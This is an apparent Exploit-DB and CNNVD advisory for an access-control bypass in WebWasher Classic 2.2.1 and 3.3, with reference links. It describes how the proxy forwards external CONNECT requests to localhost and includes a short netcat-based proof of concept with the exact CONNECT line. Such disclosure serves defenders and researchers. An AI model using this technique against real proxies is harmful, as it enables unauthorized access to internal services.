https://www.exploit-db.com/exploits/25066
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200501-317

WebWasherClassic是一款用于对网页进行过滤的软件。WebWasherClassic2.2.1和3.3版本中存在绕过访问控制机制漏洞。上述版本软件以服务器模式运行时，无法正确处理来自外部系统对localhost的CONNECT请求，这使得远程攻击者可绕过访问限制限制。

source: http://www.securityfocus.com/bid/12394/info

It is reported that WebWasher Classic is prone to a weakness that may allow remote attackers to connect to arbitrary ports on a vulnerable computer.

This weakness may be combined with other attacks to exploit latent vulnerabilities. An attacker can bypass access controls implemented by the application through this attack.

WebWasher Classic 3.3 and 2.2.1 are reported prone to this weakness. Other versions may be affected as well. 

The following proof of concept is available:
1) Start a netcat listener on the WebWasher system:
netcat -L -p 99 -s 127.0.0.1 < hallo.txt
2) Connect to the WebWasher proxy port (default 8080/tcp)
3) Enter command "CONNECT 127.0.0.1:99 HTTP/1.0"

As a result, content of hallo.txt will appear.

来源:BID
名称:12394
链接:http://www.securityfocus.com/bid/12394
来源:SECUNIA
名称:14058
链接:http://secunia.com/advisories/14058
来源:XF
名称:webwasher-classic-connect-gain-access(19144)
链接:http://xforce.iss.net/xforce/xfdb/19144
来源:MISC
链接:http://www.oliverkarow.de/research/WebWasherCONNECT.txt
来源:BUGTRAQ
名称:20050128WebWasherClassic-HTTPCONNECTweakness
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110693045507245&w;=2
来源:SECTRACK
名称:1013036
链接:http://securitytracker.com/id?1013036